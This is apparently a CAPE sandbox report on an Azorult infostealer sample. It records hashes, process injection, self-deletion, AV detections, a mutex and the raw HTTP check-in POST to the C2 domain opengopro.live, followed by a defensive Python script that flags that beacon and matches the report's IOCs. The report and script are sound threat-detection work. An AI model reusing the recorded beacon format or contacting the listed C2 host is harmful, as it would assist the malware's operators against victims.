- * MalFamily: "Azorult"
- * MalScore: 10.0
- * File Name: "Exes_a81e3db408b78bc6abc0c4d5a53050d2.exe"
- * File Size: 543102
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "7dd488e91a30fc0eb14e6021d4f6d56ce500dc7c4ed37213e4edcefb54f11396"
- * MD5: "a81e3db408b78bc6abc0c4d5a53050d2"
- * SHA1: "8ad34e7e178e3e4c918485f642eabf9a7a253e0c"
- * SHA512: "658d4ea28d2d46938e8bea140aea9e3757ad9d5e4dad6f8d82cbfbccb00bebefa68f027b29b48f0ebca22ab4be170a53672d222df74c17b55bdca932c13264bf"
- * CRC32: "6FD1DB49"
- * SSDEEP: "12288:9XwOrReFWQFAKYWZqvUPY06ZNwJSrswf3MCSelM34NXZ:9XwOrRsdZ5n6Z2JSDf3MVBIdZ"
- * Process Execution:
- "J4cpJJsKJbow.exe",
- "imgfos.exe",
- "imgfos.exe",
- "cmd.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\imgfos.exe\"",
- "imgfos.exe ",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd "
- * Signatures Detected:
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "J4cpJJsKJbow.exe, PID 1528"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url": "opengopro.live:80//luck/index.php"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x00000000, length: 0x00000020"
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x00000000, length: 0x0001ee02"
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x00000000, length: 0x0001ffe0"
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x00000020, length: 0x0001ffc0"
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x0001eae8, length: 0x00065e96"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "J4cpJJsKJbow.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://opengopro.live/luck/index.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://opengopro.live/luck/index.php"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd "
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "imgfos.exe(2416) -> imgfos.exe(380)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "imgfos.exe(2416) -> imgfos.exe(380)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "CAPE detected the Azorult malware family",
- "Details":
- "Description": "File has been identified by 11 Antiviruses on VirusTotal as malicious",
- "Details":
- "FireEye": "Generic.mg.a81e3db408b78bc6"
- "Cylance": "Unsafe"
- "Cybereason": "malicious.e178e3"
- "APEX": "Malicious"
- "Kaspersky": "UDS:DangerousObject.Multi.Generic"
- "Trapmine": "malicious.high.ml.score"
- "Microsoft": "Trojan:Win32/Wacatac.B!ml"
- "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
- "ESET-NOD32": "Win32/Injector.EHKH"
- "CrowdStrike": "win/malicious_confidence_60% (W)"
- "Qihoo-360": "HEUR/QVM41.1.7D57.Malware.Gen"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\imgfos.exe"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
- * Started Service:
- * Mutexes:
- "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\img.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\imgfos.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd",
- "C:\\Users\\user\\AppData\\Local\\Temp\\img.txt"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\img.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\imgfos.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\img.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\J4cpJJsKJbow.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd"
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "opengopro.live",
- "answers":
- "data": "104.28.3.74",
- "type": "A"
- "data": "104.28.2.74",
- "type": "A"
- * Domains:
- "ip": "104.28.2.74",
- "domain": "opengopro.live"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "uri": "http://opengopro.live/luck/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "opengopro.live",
- "version": "1.1",
- "path": "/luck/index.php",
- "data": "POST /luck/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: opengopro.live\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "United States",
- "ip": "104.28.2.74",
- "inaddrarpa": "",
- "hostname": "opengopro.live"
- * Network Communication - IRC:
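The HTTP section above records the single check-in this sample made: a POST to /luck/index.php with no Referer, an MSIE 6 user-agent that no real browser has sent in years, no Content-Type, and a short body of high-bit bytes, which is what the "post_no_referer" signature and the "ET TROJAN AZORult Variant.4 Checkin M2" alert keyed on. The script below is an added example, not part of the CAPE report or of any CAPE code: it parses a raw request the way the report's "data" field shows it, returns which of those traits are present, and scans constructed Sysmon-style log lines for the report's file, mutex and network IOCs. The thresholds (MSIE 4-7, body under 512 bytes, more than 20% high-bit bytes) and the sample log lines are assumptions chosen for illustration; only the IOC values are taken from the report.

```python
"""Detection helpers for the Azorult check-in and host IOCs in the report above.

Added example; the IOC constants are copied from the sandbox report, every
other value (thresholds, sample requests, sample log lines) is constructed.
"""
import re

# --- IOCs copied from the report ---------------------------------------------
IOC_HASHES = {
    "md5": "a81e3db408b78bc6abc0c4d5a53050d2",
    "sha1": "8ad34e7e178e3e4c918485f642eabf9a7a253e0c",
    "sha256": "7dd488e91a30fc0eb14e6021d4f6d56ce500dc7c4ed37213e4edcefb54f11396",
}
IOC_DOMAINS = {"opengopro.live"}
IOC_IPS = {"104.28.2.74", "104.28.3.74"}
IOC_MUTEX = "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726"
IOC_PATH_FRAGMENTS = ("7ZipSfx.000\\imgfos.exe", "7ZSfx000.cmd")


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path, version, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def checkin_findings(raw: bytes) -> list:
    """Return the traits of `raw` that match the check-in captured in the report.

    "post_no_referer" mirrors the sandbox signature; the other checks encode
    the traits visible in the captured request. Thresholds are assumptions.
    """
    req = parse_http_request(raw)
    h = req["headers"]
    findings = []
    if req["method"] == "POST" and "referer" not in h:
        findings.append("post_no_referer")
    if re.search(r"MSIE [4-7]\.", h.get("user-agent", "")):
        findings.append("legacy_msie_user_agent")
    host = h.get("host", "").lower()
    if host in IOC_DOMAINS or host in IOC_IPS:
        findings.append("ioc_host")
    if req["method"] == "POST" and "content-type" not in h and req["path"].endswith(".php"):
        findings.append("opaque_post_to_php")
    body = req["body"]
    if body and len(body) <= 512 and sum(b >= 0x80 for b in body) / len(body) > 0.2:
        findings.append("binary_body")  # short, non-text beacon body
    return findings


def match_iocs(line: str) -> set:
    """Return which report IOC classes appear in one log line (case-insensitive)."""
    low = line.lower()
    hits = set()
    for name, value in IOC_HASHES.items():
        if value in low:
            hits.add(name)
    if any(d in low for d in IOC_DOMAINS) or any(ip in line for ip in IOC_IPS):
        hits.add("c2")
    if IOC_MUTEX.lower() in low:
        hits.add("mutex")
    if any(p.lower() in low for p in IOC_PATH_FRAGMENTS):
        hits.add("dropper_path")
    return hits


# Constructed sample input: the report's request with a shortened 8-byte body.
CHECKIN = (
    b"POST /luck/index.php HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\n"
    b"Host: opengopro.live\r\n"
    b"Content-Length: 8\r\n"
    b"Cache-Control: no-cache\r\n\r\n"
    b"J/\xfb5/\xfb<L"
)
# Constructed benign POST for comparison.
BENIGN = (
    b"POST /api/login HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0\r\n"
    b"Referer: https://example.com/login\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 16\r\n\r\n"
    b'{"user":"alice"}'
)
# Constructed Sysmon-style log lines (not from the report).
SAMPLE_LOGS = [
    r"EID=1 Image=C:\Users\user\AppData\Local\Temp\7ZipSfx.000\imgfos.exe ParentImage=C:\Users\user\AppData\Local\Temp\J4cpJJsKJbow.exe",
    "EID=1 Image=C:\\Users\\user\\Downloads\\Exes_a81e3db408b78bc6abc0c4d5a53050d2.exe Hashes=SHA256=7DD488E91A30FC0EB14E6021D4F6D56CE500DC7C4ED37213E4EDCEFB54F11396",
    "EID=22 QueryName=opengopro.live QueryResults=104.28.2.74;104.28.3.74",
    "EID=1 Image=C:\\Windows\\System32\\notepad.exe",
]

if __name__ == "__main__":
    print("check-in :", checkin_findings(CHECKIN))
    print("benign   :", checkin_findings(BENIGN))
    for line in SAMPLE_LOGS:
        print(sorted(match_iocs(line)), "<-", line[:60])
```

The HTTP checks are deliberately independent so that a request hitting several of them (as the captured beacon does) scores higher than a lone POST without a Referer, which is common in legitimate API traffic; the IOC matcher is a plain substring scan, so rotate the domain and IP values out once the infrastructure is confirmed dead.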